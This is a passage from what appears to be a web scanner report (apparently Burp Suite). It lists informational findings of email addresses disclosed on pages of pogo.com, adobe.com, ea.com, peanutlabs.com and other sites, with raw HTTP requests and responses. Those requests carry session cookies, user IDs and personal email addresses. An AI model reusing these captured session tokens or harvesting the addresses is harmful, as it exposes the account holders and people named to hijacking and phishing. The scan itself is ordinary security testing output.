Content-Length: 213580

<!doctype html>
<html>
<head>
<title>Dean Edwards: window.onload (again)</title>
<meta name="author" content="Dean Edwards">
<link rel="stylesheet" href="http://d
...[SNIP]...
<a href="mailto:kevinl@directlogistics.com">kevinl@directlogistics.com</a>
...[SNIP]...
Event call occurs,only the last registed handler through addLoadEvent will be triggered,and thus,the rest will be simply ignored.How can i get around this problem in MSIE??
Any idea please contact me:lenatis@gmail.com
</p>
...[SNIP]...

20.62. http://download-games.pogo.com/deluxe.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download-games.pogo.com
Path:	/deluxe.aspx

Issue detail

The following email address was disclosed in the response:

review@oberon-media.com

Request

GET /deluxe.aspx HTTP/1.1
Host: download-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536510550-New%7C1297128510550%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; 117734103=Sat%20Jan%2008%202011%2019%3A28%3A34%20GMT%2D0600%20(Central%20Standard%20Time); OberonPogoComb=http%3A//download-games.pogo.com/%3Fsite%3Dpogo%26refid%3Dheadernav_fp_shopmenu%26ifw%3D756%26pageSection%3Dheader_downloads_store%26ifh%3D210%26lkey%3Dx; 11964850=Sat%20Jan%2008%202011%2019%3A28%3A45%20GMT%2D0600%20(Central%20Standard%20Time);

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Content-Length: 46993
Cache-Control: private, max-age=6361
Date: Sun, 09 Jan 2011 02:07:54 GMT
Connection: close

<HTML>
   <HEAD>


   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">


<script type="text/javascript" language="javascript" src="/JavaScri
...[SNIP]...
<a href="mailto:review@oberon-media.com?subject=Jewel Quest" class="txt10bg" style="text-decoration: underline;">
...[SNIP]...

20.63. http://jqueryui.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/about

Issue detail

The following email addresses were disclosed in the response:

contact@appendTo.com
contact@appendto.com
hello@filamentgroup.com

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 09 Jan 2011 02:22:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 14616

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<a href="mailto:contact@appendto.com">contact@appendTo.com</a>
...[SNIP]...
<a href="mailto:hello@filamentgroup.com">hello@filamentgroup.com</a>
...[SNIP]...

20.64. http://www.adobe.com/aboutadobe/contact.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adobe.com
Path:	/aboutadobe/contact.html

Issue detail

The following email address was disclosed in the response:

dklyuchn@adobe.com

Request

GET /aboutadobe/contact.html HTTP/1.1
Host: www.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 05:27:29 GMT
Server: Apache
Cache-Control: max-age=21600
Expires: Sun, 09 Jan 2011 11:27:29 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="EN" ><!-- Inst
...[SNIP]...
<a href="mailto:dklyuchn@adobe.com">dklyuchn@adobe.com</a>
...[SNIP]...

20.65. http://www.adobe.com/aboutadobe/invrelations/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adobe.com
Path:	/aboutadobe/invrelations/

Issue detail

The following email addresses were disclosed in the response:

adobe@kpcorp.com
ir@adobe.com

Request

GET /aboutadobe/invrelations/ HTTP/1.1
Host: www.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 05:27:26 GMT
Server: Apache
Cache-Control: max-age=21600
Expires: Sun, 09 Jan 2011 11:27:26 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="EN" ><!-- Inst
...[SNIP]...
<a href="mailto:ir@adobe.com">ir@adobe.com</a>
...[SNIP]...
<a href="mailto:adobe@kpcorp.com">adobe@kpcorp.com</a>
...[SNIP]...
<a href="mailto:adobe@kpcorp.com">adobe@kpcorp.com</a>
...[SNIP]...

20.66. http://www.adobe.com/cfusion/marketplace/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adobe.com
Path:	/cfusion/marketplace/index.cfm

Issue detail

The following email addresses were disclosed in the response:

jford@psyked.co.uk
widgetcast@reallusion.com

Request

Response

20.67. http://www.adobe.com/technology/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.adobe.com
Path:	/technology/

Issue detail

The following email address was disclosed in the response:

SimplyBetterJobs@adobe.com

Request

GET /technology/ HTTP/1.1
Host: www.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 05:27:31 GMT
Server: Apache
Cache-Control: max-age=21600
Expires: Sun, 09 Jan 2011 11:27:31 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding, User-Agent

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xh
...[SNIP]...
<a href="mailto:SimplyBetterJobs@adobe.com">SimplyBetterJobs@adobe.com</a>
...[SNIP]...

20.68. http://www.cmsinter.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cmsinter.net
Path:	/

Issue detail

The following email addresses were disclosed in the response:

ini_misbah@yahoo.com
sales@cmsinter.net

Request

Response

20.69. http://www.cmsinter.net/blog/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cmsinter.net
Path:	/blog/

Issue detail

The following email address was disclosed in the response:

sales@cmsinter.net

Request

GET /blog/ HTTP/1.1
Host: www.cmsinter.net
Proxy-Connection: keep-alive
Referer: http://www.cmsinter.net/?page_id=58
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=215573381.1294526267.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); undefined=0; __utma=215573381.1031492532.1294526267.1294526267.1294526267.1; __utmc=215573381; __utmb=215573381.3.10.1294526267

Response

HTTP/1.1 200 OK
Date: Sat, 08 Jan 2011 22:47:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
X-Pingback: http://www.cmsinter.net/blog/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 19317

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http://g
...[SNIP]...
<a href="mailto:sales@cmsinter.net">sales@cmsinter.net</a>
...[SNIP]...

20.70. http://www.ea.com/ipad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ea.com
Path:	/ipad

Issue detail

The following email address was disclosed in the response:

eamobile@fun.ea.com

Request

GET /ipad HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.71. http://www.ea.com/iphone previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ea.com
Path:	/iphone

Issue detail

The following email address was disclosed in the response:

eamobile@fun.ea.com

Request

GET /iphone HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.72. http://www.ea.com/mobile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ea.com
Path:	/mobile

Issue detail

The following email address was disclosed in the response:

eamobile@fun.ea.com

Request

GET /mobile HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

20.73. http://www.freshnews.com/news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc- previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freshnews.com
Path:	/news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc-

Issue detail

The following email addresses were disclosed in the response:

aharlan@e-rewards.com
jonathanc@spiralgroup.com

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 05:18:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
Set-Cookie: SESSdcb5af41d343fdd786908e4442f98f39=dpp7pp1blldcdp337o15850h97; expires=Tue, 01-Feb-2011 08:52:02 GMT; path=/; domain=.freshnews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 09 Jan 2011 05:18:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="mailto:jonathanc@spiralgroup.com">jonathanc@spiralgroup.com</a>
...[SNIP]...
<a href="mailto:aharlan@e-rewards.com">aharlan@e-rewards.com</a>
...[SNIP]...

20.74. http://www.mlive.com/js/sitecatalyst/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mlive.com
Path:	/js/sitecatalyst/s_code.js

Issue detail

The following email address was disclosed in the response:

id@Ls.tc

Request

GET /js/sitecatalyst/s_code.js HTTP/1.1
Host: www.mlive.com
Proxy-Connection: keep-alive
Referer: http://www.mlive.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 26 Aug 2010 14:35:29 GMT
ETag: "764400-8e54-48ebae8e18e40"
Accept-Ranges: bytes
P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM'
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=1
Expires: Sun, 09 Jan 2011 01:48:28 GMT
Date: Sun, 09 Jan 2011 01:48:27 GMT
Connection: close
Content-Length: 36436

/* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************
Plu
...[SNIP]...
.hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L;
...[SNIP]...

20.75. http://www.peanutlabs.com/core.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/core.php

Issue detail

The following email address was disclosed in the response:

test4@fastdial.net

Request

GET /core.php?coreClass=IdCmd&cmd=init&module=user&email=&userId=998826224-3432-8939b981e2&user_id=998826224-3432-8939b981e2&writer=JSONManualCmdWriter&minIndex=0&maxIndex=4&back=undefined&category=&standbyIcon=undefined&iframe_tag=&rewardAvailable=&coreName=CmdCore HTTP/1.1
Host: www.peanutlabs.com
Proxy-Connection: keep-alive
Referer: http://www.peanutlabs.com/userGreeting.php?userId=998826224-3432-8939b981e2&var_val_1=10010&var_key_1=zipcode
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.1.10.1294536629; pl_user_id=8939b981e2-5329197bbf0fb46f475fdce27e545262

Response

20.76. http://www.peanutlabs.com/core.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/core.php

Issue detail

The following email addresses were disclosed in the response:

publisher.integration@peanutlabs.com
support-media@peanutlabsmedia.com

Request

GET /core.php?sk=d12cec1a4fc53db354ed1c228a0de882&module=publisher&coreClass=ParentCompanyInitCmd&coreName=CmdCore&writer=XMLCmdWriter HTTP/1.1
Host: www.peanutlabs.com
Proxy-Connection: keep-alive
Referer: http://www.peanutlabs.com/publisher/dashboard2/PublisherDashboard2.swf?id=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pl_email=test4%40fastdial.net; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.2.10.1294536629; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:35:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/xml
Content-Length: 1127

<?xml version="1.0"?><root><id>1</id><name>Peanut Labs Media</name><domain>www.peanutlabs.com</domain><site_url>http://www.peanutlabsmedia.com</site_url><logo_url_medium>/IMG/parent_company.logo_url_m
...[SNIP]...
<support_email>publisher.integration@peanutlabs.com</support_email><user_support_email>support-media@peanutlabsmedia.com</user_support_email>
...[SNIP]...

20.77. http://www.peanutlabs.com/media/case_studies.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/media/case_studies.php

Issue detail

The following email address was disclosed in the response:

support-media@peanutlabsmedia.com

Request

GET /media/case_studies.php HTTP/1.1
Host: www.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sex=deleted; pl_email=test4%40fastdial.net; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_lang=en_US; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; ext_cid=deleted; dob=deleted; PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; pl_profile=deleted; __utmc=184043431; __utmb=184043431.2.10.1294536629;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:07:25 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 7142
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<span class="email">support-media@peanutlabsmedia.com</span>
...[SNIP]...

20.78. http://www.peanutlabs.com/media/company.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/media/company.php

Issue detail

The following email address was disclosed in the response:

support-media@peanutlabsmedia.com

Request

GET /media/company.php HTTP/1.1
Host: www.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sex=deleted; pl_email=test4%40fastdial.net; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_lang=en_US; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; ext_cid=deleted; dob=deleted; PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; pl_profile=deleted; __utmc=184043431; __utmb=184043431.2.10.1294536629;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:07:28 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8595

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<span class="email">support-media@peanutlabsmedia.com</span>
...[SNIP]...

20.79. http://www.peanutlabs.com/media/contact.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/media/contact.php

Issue detail

The following email address was disclosed in the response:

support-media@peanutlabsmedia.com

Request

GET /media/contact.php HTTP/1.1
Host: www.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sex=deleted; pl_email=test4%40fastdial.net; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_lang=en_US; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; ext_cid=deleted; dob=deleted; PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; pl_profile=deleted; __utmc=184043431; __utmb=184043431.2.10.1294536629;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:07:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<span class="email">support-media@peanutlabsmedia.com</span>
...[SNIP]...

20.80. http://www.peanutlabs.com/media/map.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/media/map.php

Issue detail

The following email address was disclosed in the response:

support-media@peanutlabsmedia.com

Request

GET /media/map.php HTTP/1.1
Host: www.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sex=deleted; pl_email=test4%40fastdial.net; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_lang=en_US; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; ext_cid=deleted; dob=deleted; PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; pl_profile=deleted; __utmc=184043431; __utmb=184043431.2.10.1294536629;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:07:24 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 6053
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<span class="email">support-media@peanutlabsmedia.com</span>
...[SNIP]...

20.81. http://www.peanutlabs.com/media/privacy_policy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/media/privacy_policy.php

Issue detail

The following email addresses were disclosed in the response:

support-media@peanutlabsmedia.com
support@peanutlabs.com

Request

GET /media/privacy_policy.php HTTP/1.1
Host: www.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sex=deleted; pl_email=test4%40fastdial.net; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_lang=en_US; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; ext_cid=deleted; dob=deleted; PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; pl_profile=deleted; __utmc=184043431; __utmb=184043431.2.10.1294536629;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:07:30 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 13154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<p>By filling out a profile, you agree to receive invitations to participate in our Internet surveys. If you would like to discontinue receiving invitations to participate, please e-mail us at support@peanutlabs.com and write "Remove Name" in the subject line. If a respondent chooses to formally end their survey participation, all information related to their individual profile will be permanently removed from ou
...[SNIP]...
<a href="mailto:support@peanutlabs.com">support@peanutlabs.com</a>
...[SNIP]...
<span class="email">support-media@peanutlabsmedia.com</span>
...[SNIP]...

20.82. http://www.peanutlabs.com/media/publishers.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/media/publishers.php

Issue detail

The following email address was disclosed in the response:

support-media@peanutlabsmedia.com

Request

GET /media/publishers.php HTTP/1.1
Host: www.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sex=deleted; pl_email=test4%40fastdial.net; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_lang=en_US; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; ext_cid=deleted; dob=deleted; PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; pl_profile=deleted; __utmc=184043431; __utmb=184043431.2.10.1294536629;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:07:18 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...
<span class="email">support-media@peanutlabsmedia.com</span>
...[SNIP]...

20.83. http://www.peanutlabs.com/media/terms.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/media/terms.php

Issue detail

The following email address was disclosed in the response:

support-media@peanutlabsmedia.com

Request

GET /media/terms.php HTTP/1.1
Host: www.peanutlabs.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.1.10.1294536629; pl_email=test4%40fastdial.net; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:35:11 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 18136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<span class="email">support-media@peanutlabsmedia.com</span>
...[SNIP]...

20.84. http://www.peanutlabs.com/pl/privacyPolicy.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/pl/privacyPolicy.php

Issue detail

The following email address was disclosed in the response:

support@peanutlabs.com

Request

GET /pl/privacyPolicy.php HTTP/1.1
Host: www.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sex=deleted; pl_email=test4%40fastdial.net; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_lang=en_US; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; ext_cid=deleted; dob=deleted; PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; pl_profile=deleted; __utmc=184043431; __utmb=184043431.2.10.1294536629;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:06:16 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 11172

